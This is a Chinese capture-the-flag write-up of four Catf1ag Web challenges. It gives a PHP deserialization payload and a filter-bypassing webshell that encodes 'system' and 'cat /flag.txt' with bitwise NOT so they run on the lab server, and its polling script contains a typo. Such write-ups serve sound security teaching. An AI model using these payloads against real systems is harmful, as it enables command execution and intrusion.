Catf1ag CTF Web（六）

前言

Catf1agCTF 是一个面向所有CTF（Capture The Flag）爱好者的综合训练平台，尤其适合新手学习和提升技能 。该平台由catf1ag团队打造，拥有超过200个原创题目，题目设计注重知识点的掌握，旨在帮助新手掌握CTF相关的各种技能 。除了新手题目，平台也包含难度不一的题目，适合不同水平的CTF参与者 。

平台上的题目类型多样，包括WEB、MISC、CRYPTO、LINUX、PWN/ATTACK、REVERSE等，题目分数制度从60分到100分不等，难度从1星到5星 。题目提交时需要包含完整的题目环境、flag以及writeup，以确保题目的完整性和可解性 。

此外，Catf1agCTF平台还提供了一些辅助工具和资源，如在线工具箱、SRC资料和HW资料等，以帮助用户更好地进行学习和实战演练 。平台的网址为 https://catf1ag.cn/，有意向的用户可以通过官方邮箱catf1ag@163.com进行联系 。对于想要加入交流的用户，平台还提供了官方QQ群和频道，方便用户之间的互动和交流 。

需要注意的是，平台上的部分题目可能需要特定的环境配置，例如WEB题目会包含dockerfile，而PWN/ATTACK题目则必须包含dockerfile以确保题目环境的完整性 。对于题目的flag格式，平台有统一的要求，即flag需要以"catf1ag{}"的格式呈现 。

总的来说，Catf1agCTF是一个资源丰富、适合各个水平CTF爱好者的训练平台，无论是新手还是有经验的参与者，都能在这里找到适合自己的学习和提升机会。

一、bypass_wakeup

打开靶场

给出了源码 

很简单的反序列化

http://subject.catf1ag.cn:44360//?ser=O:4:%22flag%22:1:{s:4:%22name%22;s:7:%22catflag%22;}

二、无字符 webshell

打开靶场

给出了源码 

使用 URL 编码将要被过滤的字母编码，再利用 $、_ 组成变量

//基本格式
<?php
        $a = "system";
        echo urlencode(~$a);
?>
//system： %8C%86%8C%8B%9A%92
//ls:    %93%8C
//ls /:    %93%8C%DF%D0

?cmd=$_=~%8C%86%8C%8B%9A%92;$__=~%93%8C;$_($__);

没有看到 flag 则查看 / 下面的 

?cmd=$_=~%8C%86%8C%8B%9A%92;$__=~%93%8C%DF%D0;$_($__);

拿到 flag

/?cmd=$_=~%8C%86%8C%8B%9A%92;$__=~%9C%9E%8B%DF%D0%99%93%9E%98%D1%8B%87%8B;$_($__);

三、舔dog日记

打开靶场

页面如下

可以看到 URL 给出了路径及参数（经过了 Base64 加密）

先解密 

先将 flag.txt 编码后再访问 

在源代码中看到 flag

四、遍历遍历

打开靶场

页面如下 

 每次刷新 content 都会改变

编写一个爬虫脚本访问即可

import requests
url = "http://subject.catf1ag.cn:47098/"
while Ture:
    response = requests.get(url)
    if 'catf1ag' in response.text:
        print(response.text)
        break